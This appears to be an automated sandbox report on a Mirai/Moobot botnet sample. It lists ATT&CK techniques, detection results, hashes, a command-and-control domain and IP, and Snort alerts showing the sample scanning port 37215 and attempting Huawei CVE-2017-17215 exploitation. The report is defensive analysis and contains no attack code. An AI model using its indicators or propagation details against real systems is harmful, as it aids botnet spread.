            Source: lD25Z9LfKe.elf, 6224.1.00007ffccda8b000.00007ffccdaac000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/lD25Z9LfKe.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/lD25Z9LfKe.elf

            Stealing of Sensitive Information

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: lD25Z9LfKe.elf, type: SAMPLE
            Source: Yara matchFile source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY
            Yara detected Moobot
            Source: Yara matchFile source: lD25Z9LfKe.elf, type: SAMPLE
            Source: Yara matchFile source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: lD25Z9LfKe.elf, type: SAMPLE
            Source: Yara matchFile source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY
            Yara detected Moobot
            Source: Yara matchFile source: lD25Z9LfKe.elf, type: SAMPLE
            Source: Yara matchFile source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Scripting            		Path InterceptionPath Interception2
            File and Directory Permissions Modification            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Scripting            		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            File Deletion            		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830684 Sample: lD25Z9LfKe.elf Startdate: 20/03/2023 Architecture: LINUX Score: 92 27 j.xnyidc.top 2->27 29 41.60.196.93 realtime-asZM Mauritius 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 8 lD25Z9LfKe.elf 2->8         started        signatures3 process4 process5 10 lD25Z9LfKe.elf sh 8->10         started        12 lD25Z9LfKe.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 lD25Z9LfKe.elf 12->23         started        25 lD25Z9LfKe.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            lD25Z9LfKe.elf61%VirustotalBrowse
            lD25Z9LfKe.elf62%ReversingLabsLinux.Trojan.Mirai

            Dropped Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            j.xnyidc.top
            		156.224.24.249
            		truetrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/lD25Z9LfKe.elffalse
                		high
                http://schemas.xmlsoap.org/soap/envelope/lD25Z9LfKe.elffalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  41.140.45.249
                  		unknownMorocco
                  		36903MT-MPLSMAfalse
                  197.32.82.226
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  163.158.117.225
                  		unknownNetherlands
                  		15435KABELFOONDELTAFiberNederlandNLfalse
                  197.222.170.148
                  		unknownEgypt
                  		37069MOBINILEGfalse
                  156.68.4.30
                  		unknownUnited States
                  		297AS297USfalse
                  157.170.134.145
                  		unknownUnited States
                  		22192SSHENETUSfalse
                  191.251.70.242
                  		unknownBrazil
                  		18881TELEFONICABRASILSABRfalse
                  157.25.93.74
                  		unknownPoland
                  		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                  197.166.178.20
                  		unknownEgypt
                  		24863LINKdotNET-ASEGfalse
                  41.37.167.64
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  41.157.17.94
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  197.13.10.211
                  		unknownTunisia
                  		37504MeninxTNfalse
                  166.7.140.80
                  		unknownUnited States
                  		4152USDA-1USfalse
                  42.244.163.220
                  		unknownChina
                  		4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  197.96.136.79
                  		unknownSouth Africa
                  		3741ISZAfalse
                  41.28.116.156
                  		unknownSouth Africa
                  		29975VODACOM-ZAfalse
                  41.225.142.122
                  		unknownTunisia
                  		37671GLOBALNET-ASTNfalse
                  157.187.164.211
                  		unknownUnited States
                  		668DNIC-AS-00668USfalse
                  197.67.5.199
                  		unknownSouth Africa
                  		16637MTNNS-ASZAfalse
                  157.201.93.207
                  		unknownUnited States
                  		33281BRIGHAM-YOUNG-UNIVERSITY-IDAHOUSfalse
                  41.197.85.111
                  		unknownRwanda
                  		36934Broadband-Systems-CorporationRWfalse
                  157.91.133.253
                  		unknownUnited States
                  		1767ILIGHT-NETUSfalse
                  116.40.18.77
                  		unknownKorea Republic of
                  		17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                  25.39.89.88
                  		unknownUnited Kingdom
                  		7922COMCAST-7922USfalse
                  197.38.199.133
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  157.215.94.18
                  		unknownUnited States
                  		4704SANNETRakutenMobileIncJPfalse
                  41.140.45.231
                  		unknownMorocco
                  		36903MT-MPLSMAfalse
                  157.78.121.27
                  		unknownJapan4725ODNSoftBankMobileCorpJPfalse
                  41.87.162.76
                  		unknownBotswana
                  		14988BTC-GATE1BWfalse
                  157.229.129.36
                  		unknownUnited States
                  		122UPMC-AS122USfalse
                  197.53.131.60
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.208.8.24
                  		unknownSudan
                  		36998SDN-MOBITELSDfalse
                  146.113.78.52
                  		unknownUnited States
                  		19653CTSTELECOMUSfalse
                  41.169.49.23
                  		unknownSouth Africa
                  		36937Neotel-ASZAfalse
                  115.32.176.38
                  		unknownChina
                  		4766KIXS-AS-KRKoreaTelecomKRfalse
                  93.42.245.167
                  		unknownItaly
                  		12874FASTWEBITfalse
                  217.174.200.116
                  		unknownFrance
                  		16128AGARIK-NETWORKAGARIKprovideWEBServersHostinganddedicfalse
                  116.227.65.226
                  		unknownChina
                  		4812CHINANET-SH-APChinaTelecomGroupCNfalse
                  197.205.16.187
                  		unknownAlgeria
                  		36947ALGTEL-ASDZfalse
                  197.234.167.162
                  		unknownSouth Africa
                  		37315CipherWaveZAfalse
                  105.120.48.139
                  		unknownNigeria
                  		36873VNL1-ASNGfalse
                  41.133.87.44
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  197.43.173.201
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.213.176.58
                  		unknownZambia
                  		37287ZAIN-ZAMBIAZMfalse
                  41.215.72.106
                  		unknownKenya
                  		15808ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEfalse
                  177.143.135.107
                  		unknownBrazil
                  		28573CLAROSABRfalse
                  41.29.197.7
                  		unknownSouth Africa
                  		29975VODACOM-ZAfalse
                  157.68.50.108
                  		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  51.166.246.213
                  		unknownUnited States
                  		2686ATGS-MMD-ASUSfalse
                  218.9.165.51
                  		unknownChina
                  		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  157.172.225.249
                  		unknownFrance
                  		22192SSHENETUSfalse
                  72.211.79.5
                  		unknownUnited States
                  		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                  197.150.214.14
                  		unknownEgypt
                  		37069MOBINILEGfalse
                  65.165.199.98
                  		unknownUnited States
                  		397461DURA-DHQ01USfalse
                  41.108.235.23
                  		unknownAlgeria
                  		36947ALGTEL-ASDZfalse
                  197.192.154.253
                  		unknownEgypt
                  		36992ETISALAT-MISREGfalse
                  144.159.93.230
                  		unknownUnited States
                  		58541CHINATELECOM-SHANDONG-QINGDAO-IDCQingdao266000CNfalse
                  197.82.0.71
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  62.112.56.5
                  		unknownGermany
                  		13157GOPAS-ASSchellerdamm16DEfalse
                  41.254.111.167
                  		unknownLibyan Arab Jamahiriya
                  		21003GPTC-ASLYfalse
                  148.136.130.185
                  		unknownSweden
                  		3246TDCSONGTele2BusinessTDCSwedenSEfalse
                  41.54.81.5
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  197.254.68.2
                  		unknownKenya
                  		15808ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEfalse
                  41.38.222.219
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.53.118.43
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  197.240.217.45
                  		unknownunknown
                  		37705TOPNETTNfalse
                  157.217.179.234
                  		unknownUnited States
                  		4704SANNETRakutenMobileIncJPfalse
                  41.85.100.79
                  		unknownSouth Africa
                  		328418Olena-Trading-ASZAfalse
                  197.0.31.226
                  		unknownTunisia
                  		37705TOPNETTNfalse
                  81.201.187.28
                  		unknownFrance
                  		41157OXYMIUMFRfalse
                  78.209.232.177
                  		unknownFrance
                  		12322PROXADFRfalse
                  41.60.103.187
                  		unknownMauritius
                  		30969ZOL-ASGBfalse
                  41.30.242.98
                  		unknownSouth Africa
                  		29975VODACOM-ZAfalse
                  197.223.25.39
                  		unknownEgypt
                  		37069MOBINILEGfalse
                  41.213.11.5
                  		unknownSouth Africa
                  		33762rainZAfalse
                  41.60.196.93
                  		unknownMauritius
                  		37146realtime-asZMfalse
                  197.34.133.169
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  41.110.164.253
                  		unknownAlgeria
                  		36947ALGTEL-ASDZfalse
                  197.167.121.188
                  		unknownEgypt
                  		24863LINKdotNET-ASEGfalse
                  41.78.159.18
                  		unknownNigeria
                  		37249CWHOUSENGfalse
                  132.166.229.117
                  		unknownFrance
                  		777CEA-SaclayEUfalse
                  197.104.43.201
                  		unknownSouth Africa
                  		37168CELL-CZAfalse
                  157.104.170.195
                  		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  157.111.84.0
                  		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  64.209.21.87
                  		unknownUnited States
                  		3549LVLT-3549USfalse
                  41.237.81.183
                  		unknownEgypt
                  		8452TE-ASTE-ASEGfalse
                  157.170.134.112
                  		unknownUnited States
                  		22192SSHENETUSfalse
                  41.112.220.172
                  		unknownSouth Africa
                  		16637MTNNS-ASZAfalse
                  197.123.173.64
                  		unknownEgypt
                  		36992ETISALAT-MISREGfalse
                  216.90.206.88
                  		unknownUnited States
                  		3561CENTURYLINK-LEGACY-SAVVISUSfalse
                  41.167.92.137
                  		unknownSouth Africa
                  		36937Neotel-ASZAfalse
                  197.133.107.209
                  		unknownEgypt
                  		24835RAYA-ASEGfalse
                  123.234.32.254
                  		unknownChina
                  		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  197.194.23.197
                  		unknownEgypt
                  		36992ETISALAT-MISREGfalse
                  157.114.174.50
                  		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  20.68.251.26
                  		unknownUnited States
                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  197.89.224.214
                  		unknownSouth Africa
                  		10474OPTINETZAfalse
                  197.217.201.64
                  		unknownAngola
                  		11259ANGOLATELECOMAOfalse
                  43.177.91.167
                  		unknownJapan4249LILLY-ASUSfalse
                  188.188.192.207
                  		unknownBelgium
                  		44944BASE-ASTelenetGroupNVSABEfalse

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):6.271370241540659
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:lD25Z9LfKe.elf
                  File size:62988
                  MD5:c929d58b6bb8f66edc985003ba50c3c1
                  SHA1:711976261f2f197a341dca8afdb7679f04aa3f99
                  SHA256:e1366976365db1f2bffdc37d4e64e12f883f9a20e02b12d52b6a1b346b8f0692
                  SHA512:3982301f57bf1e26ee56855de69eb9dce72e2ff1b3437ab9608433955c09f8c2f2e44d120daaaa7edc12e755884555dc5cfa0578f03d18233e256de9c9feb4bb
                  SSDEEP:768:qkaZjEoakZNRGHRnDmX7Xm+t/UGV8+BCpEMCi/J9KCrMvuBxANUr6FV+tMiwWfIC:MvolWm+phBgd/KCAWBxANee++bWfvF
                  TLSH:C0534B02B31C0A07D1A31AB0253F5BD197BBEAD022F4F684751F979A96B5E361182FCD
                  File Content Preview:.ELF...........................4...,.....4. ...(.......................p...p...............t...t...t...l..%t........dt.Q.............................!..|......$H...H..-...$8!. |...N.. .!..|.......?..........T..../...@..\?........+../...A..$8...})......N..

                  Static ELF Info

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:

                  Sections

                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x100000940x940x240x00x6AX004
                  .textPROGBITS0x100000b80xb80xd1840x00x6AX004
                  .finiPROGBITS0x1000d23c0xd23c0x200x00x6AX004
                  .rodataPROGBITS0x1000d2600xd2600x1e100x00x2A008
                  .ctorsPROGBITS0x1001f0740xf0740x80x00x3WA004
                  .dtorsPROGBITS0x1001f07c0xf07c0x80x00x3WA004
                  .dataPROGBITS0x1001f0880xf0880x3140x00x3WA008
                  .sdataPROGBITS0x1001f39c0xf39c0x440x00x3WA004
                  .sbssNOBITS0x1001f3e00xf3e00x740x00x3WA004
                  .bssNOBITS0x1001f4540xf3e00x21940x00x3WA004
                  .shstrtabSTRTAB0x00xf3e00x4b0x00x0001

                  Program Segments

                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x100000000x100000000xf0700xf0706.32120x5R E0x10000.init .text .fini .rodata
                  LOAD0xf0740x1001f0740x1001f0740x36c0x25742.84250x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.238.8.8.833891532023883 03/20/23-15:59:46.829796UDP2023883ET DNS Query to a *.top domain - Likely Hostile3389153192.168.2.238.8.8.8
                  192.168.2.2341.37.68.24642302372152835222 03/20/23-16:00:54.853824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230237215192.168.2.2341.37.68.246
                  192.168.2.23192.119.137.7457754372152835222 03/20/23-16:01:50.220586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775437215192.168.2.23192.119.137.74
                  156.224.24.249192.168.2.2356999478282030489 03/20/23-16:01:45.327043TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699947828156.224.24.249192.168.2.23
                  192.168.2.23197.39.222.15245430372152835222 03/20/23-16:01:18.217927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543037215192.168.2.23197.39.222.152
                  156.224.24.249192.168.2.2356999477962030489 03/20/23-16:00:44.195958TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699947796156.224.24.249192.168.2.23
                  192.168.2.23197.214.98.3835290372152835222 03/20/23-16:00:31.085625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529037215192.168.2.23197.214.98.38
                  192.168.2.23141.117.56.18059180372152835222 03/20/23-16:01:09.639143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918037215192.168.2.23141.117.56.180
                  192.168.2.23156.224.24.24947828569992030490 03/20/23-16:00:49.583605TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)4782856999192.168.2.23156.224.24.249
                  192.168.2.2334.117.1.25340848372152835222 03/20/23-16:00:17.642577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084837215192.168.2.2334.117.1.253
                  192.168.2.23103.167.148.13246324372152835222 03/20/23-16:00:41.668931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632437215192.168.2.23103.167.148.132
                  192.168.2.2341.237.49.24132970372152835222 03/20/23-16:00:38.463363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297037215192.168.2.2341.237.49.241
                  192.168.2.2341.234.87.5138528372152835222 03/20/23-16:01:07.497528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852837215192.168.2.2341.234.87.51
                  192.168.2.2341.236.241.24052042372152835222 03/20/23-16:01:35.636258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204237215192.168.2.2341.236.241.240
                  192.168.2.23197.234.59.6833038372152835222 03/20/23-16:00:22.715968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303837215192.168.2.23197.234.59.68
                  192.168.2.2341.34.164.7957718372152835222 03/20/23-15:59:50.971789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771837215192.168.2.2341.34.164.79
                  192.168.2.238.8.8.859786532023883 03/20/23-16:00:49.089429UDP2023883ET DNS Query to a *.top domain - Likely Hostile5978653192.168.2.238.8.8.8
                  192.168.2.2320.28.196.13955414372152835222 03/20/23-16:01:13.960170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541437215192.168.2.2320.28.196.139
                  192.168.2.23156.224.24.24947796569992030490 03/20/23-15:59:47.422349TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)4779656999192.168.2.23156.224.24.249

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 20, 2023 15:59:46.357553005 CET42836443192.168.2.2391.189.91.43
                  Mar 20, 2023 15:59:46.832477093 CET153537215192.168.2.23108.23.15.161
                  Mar 20, 2023 15:59:46.832549095 CET153537215192.168.2.2341.165.92.99
                  Mar 20, 2023 15:59:46.832602978 CET153537215192.168.2.23104.153.167.161
                  Mar 20, 2023 15:59:46.832648039 CET153537215192.168.2.2341.42.145.5
                  Mar 20, 2023 15:59:46.832719088 CET153537215192.168.2.2341.20.140.65
                  Mar 20, 2023 15:59:46.832736969 CET153537215192.168.2.2341.64.209.101
                  Mar 20, 2023 15:59:46.832808971 CET153537215192.168.2.23197.140.236.98
                  Mar 20, 2023 15:59:46.832837105 CET153537215192.168.2.23157.244.59.153
                  Mar 20, 2023 15:59:46.832858086 CET153537215192.168.2.23157.97.202.233
                  Mar 20, 2023 15:59:46.832937002 CET153537215192.168.2.23197.213.2.53
                  Mar 20, 2023 15:59:46.832948923 CET153537215192.168.2.2341.108.8.168
                  Mar 20, 2023 15:59:46.832988024 CET153537215192.168.2.23151.205.68.245
                  Mar 20, 2023 15:59:46.833002090 CET153537215192.168.2.23197.255.112.187
                  Mar 20, 2023 15:59:46.833028078 CET153537215192.168.2.23157.160.174.21
                  Mar 20, 2023 15:59:46.833122015 CET153537215192.168.2.23197.253.197.212
                  Mar 20, 2023 15:59:46.833165884 CET153537215192.168.2.23132.62.148.240
                  Mar 20, 2023 15:59:46.833179951 CET153537215192.168.2.2312.57.136.99
                  Mar 20, 2023 15:59:46.833251953 CET153537215192.168.2.23186.31.201.229
                  Mar 20, 2023 15:59:46.833280087 CET153537215192.168.2.23157.175.42.37
                  Mar 20, 2023 15:59:46.833297014 CET153537215192.168.2.23197.202.60.226
                  Mar 20, 2023 15:59:46.833338022 CET153537215192.168.2.2341.64.226.37
                  Mar 20, 2023 15:59:46.833365917 CET153537215192.168.2.23197.26.253.120
                  Mar 20, 2023 15:59:46.833425045 CET153537215192.168.2.23197.113.57.36
                  Mar 20, 2023 15:59:46.833447933 CET153537215192.168.2.23197.82.51.24
                  Mar 20, 2023 15:59:46.833777905 CET153537215192.168.2.2357.109.182.87
                  Mar 20, 2023 15:59:46.833796024 CET153537215192.168.2.23197.167.145.206
                  Mar 20, 2023 15:59:46.833820105 CET153537215192.168.2.23197.227.157.64
                  Mar 20, 2023 15:59:46.833848953 CET153537215192.168.2.2341.179.174.37
                  Mar 20, 2023 15:59:46.833914042 CET153537215192.168.2.23197.85.238.20
                  Mar 20, 2023 15:59:46.833946943 CET153537215192.168.2.2373.165.229.133
                  Mar 20, 2023 15:59:46.833983898 CET153537215192.168.2.23197.154.6.95
                  Mar 20, 2023 15:59:46.834052086 CET153537215192.168.2.2341.194.99.37
                  Mar 20, 2023 15:59:46.834063053 CET153537215192.168.2.23157.166.106.157
                  Mar 20, 2023 15:59:46.834084034 CET153537215192.168.2.2341.161.169.80
                  Mar 20, 2023 15:59:46.834112883 CET153537215192.168.2.2341.88.149.180
                  Mar 20, 2023 15:59:46.834131002 CET153537215192.168.2.23197.25.122.189
                  Mar 20, 2023 15:59:46.834181070 CET153537215192.168.2.23157.91.173.234
                  Mar 20, 2023 15:59:46.834197998 CET153537215192.168.2.23157.53.184.138
                  Mar 20, 2023 15:59:46.834224939 CET153537215192.168.2.23157.26.172.56
                  Mar 20, 2023 15:59:46.834259033 CET153537215192.168.2.23157.204.227.45
                  Mar 20, 2023 15:59:46.834300995 CET153537215192.168.2.23157.15.82.229
                  Mar 20, 2023 15:59:46.834517002 CET153537215192.168.2.23157.251.194.205
                  Mar 20, 2023 15:59:46.834547043 CET153537215192.168.2.2379.178.176.109
                  Mar 20, 2023 15:59:46.834587097 CET153537215192.168.2.23197.199.28.116
                  Mar 20, 2023 15:59:46.834594965 CET153537215192.168.2.23197.255.52.105
                  Mar 20, 2023 15:59:46.834727049 CET153537215192.168.2.23157.127.210.180
                  Mar 20, 2023 15:59:46.834758043 CET153537215192.168.2.2341.13.33.224
                  Mar 20, 2023 15:59:46.834822893 CET153537215192.168.2.2341.223.156.180
                  Mar 20, 2023 15:59:46.834849119 CET153537215192.168.2.23182.83.22.166
                  Mar 20, 2023 15:59:46.834950924 CET153537215192.168.2.23197.34.53.56
                  Mar 20, 2023 15:59:46.834975004 CET153537215192.168.2.23197.190.66.222
                  Mar 20, 2023 15:59:46.835010052 CET153537215192.168.2.2341.224.156.109
                  Mar 20, 2023 15:59:46.835035086 CET153537215192.168.2.23209.212.113.30
                  Mar 20, 2023 15:59:46.835074902 CET153537215192.168.2.2341.143.38.129
                  Mar 20, 2023 15:59:46.835099936 CET153537215192.168.2.2318.1.233.177
                  Mar 20, 2023 15:59:46.835129023 CET153537215192.168.2.23197.69.152.42
                  Mar 20, 2023 15:59:46.835161924 CET153537215192.168.2.2341.58.171.0
                  Mar 20, 2023 15:59:46.835174084 CET153537215192.168.2.23197.21.64.242
                  Mar 20, 2023 15:59:46.835196018 CET153537215192.168.2.23157.205.222.221
                  Mar 20, 2023 15:59:46.835211039 CET153537215192.168.2.23197.240.161.132
                  Mar 20, 2023 15:59:46.835233927 CET153537215192.168.2.23157.108.232.109
                  Mar 20, 2023 15:59:46.835262060 CET153537215192.168.2.23197.89.166.81
                  Mar 20, 2023 15:59:46.835285902 CET153537215192.168.2.23216.34.3.69
                  Mar 20, 2023 15:59:46.835309029 CET153537215192.168.2.2341.43.139.65
                  Mar 20, 2023 15:59:46.835329056 CET153537215192.168.2.23157.171.54.124
                  Mar 20, 2023 15:59:46.835372925 CET153537215192.168.2.23197.198.147.97
                  Mar 20, 2023 15:59:46.835395098 CET153537215192.168.2.23157.56.100.50
                  Mar 20, 2023 15:59:46.835417986 CET153537215192.168.2.2332.196.123.107
                  Mar 20, 2023 15:59:46.835443974 CET153537215192.168.2.23157.85.243.10
                  Mar 20, 2023 15:59:46.835469961 CET153537215192.168.2.2341.152.244.247
                  Mar 20, 2023 15:59:46.835500956 CET153537215192.168.2.23184.199.41.192
                  Mar 20, 2023 15:59:46.835535049 CET153537215192.168.2.2367.232.166.126
                  Mar 20, 2023 15:59:46.835561991 CET153537215192.168.2.2341.209.49.128
                  Mar 20, 2023 15:59:46.835591078 CET153537215192.168.2.23163.198.50.144
                  Mar 20, 2023 15:59:46.835613012 CET153537215192.168.2.2341.219.5.134
                  Mar 20, 2023 15:59:46.835633039 CET153537215192.168.2.2341.81.255.113
                  Mar 20, 2023 15:59:46.835671902 CET153537215192.168.2.23153.139.178.236
                  Mar 20, 2023 15:59:46.835699081 CET153537215192.168.2.23107.251.18.105
                  Mar 20, 2023 15:59:46.835724115 CET153537215192.168.2.23197.26.152.231
                  Mar 20, 2023 15:59:46.835772038 CET153537215192.168.2.23197.89.224.214
                  Mar 20, 2023 15:59:46.835800886 CET153537215192.168.2.23157.215.74.158
                  Mar 20, 2023 15:59:46.835824013 CET153537215192.168.2.2341.68.189.93
                  Mar 20, 2023 15:59:46.835874081 CET153537215192.168.2.23157.247.249.84
                  Mar 20, 2023 15:59:46.835897923 CET153537215192.168.2.23157.52.242.6
                  Mar 20, 2023 15:59:46.835936069 CET153537215192.168.2.23157.203.31.65
                  Mar 20, 2023 15:59:46.835994005 CET153537215192.168.2.2341.59.75.104
                  Mar 20, 2023 15:59:46.836019993 CET153537215192.168.2.2341.120.113.154
                  Mar 20, 2023 15:59:46.836052895 CET153537215192.168.2.2341.72.62.52
                  Mar 20, 2023 15:59:46.836077929 CET153537215192.168.2.23148.40.162.183
                  Mar 20, 2023 15:59:46.836103916 CET153537215192.168.2.2376.202.191.68
                  Mar 20, 2023 15:59:46.836149931 CET153537215192.168.2.23157.193.163.186
                  Mar 20, 2023 15:59:46.836177111 CET153537215192.168.2.23157.32.3.105
                  Mar 20, 2023 15:59:46.836241007 CET153537215192.168.2.23197.203.164.65
                  Mar 20, 2023 15:59:46.836271048 CET153537215192.168.2.2341.170.187.146
                  Mar 20, 2023 15:59:46.836271048 CET153537215192.168.2.2341.158.241.252
                  Mar 20, 2023 15:59:46.836288929 CET153537215192.168.2.23197.221.139.5
                  Mar 20, 2023 15:59:46.836375952 CET153537215192.168.2.23197.204.102.129
                  Mar 20, 2023 15:59:46.836411953 CET153537215192.168.2.23219.89.123.50
                  Mar 20, 2023 15:59:46.836438894 CET153537215192.168.2.23197.38.164.8

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 20, 2023 15:59:46.829796076 CET192.168.2.238.8.8.80xa123Standard query (0)j.xnyidc.topA (IP address)IN (0x0001)false
                  Mar 20, 2023 16:00:49.089428902 CET192.168.2.238.8.8.80xb38eStandard query (0)j.xnyidc.topA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 20, 2023 15:59:47.205801010 CET8.8.8.8192.168.2.230xa123No error (0)j.xnyidc.top156.224.24.249A (IP address)IN (0x0001)false
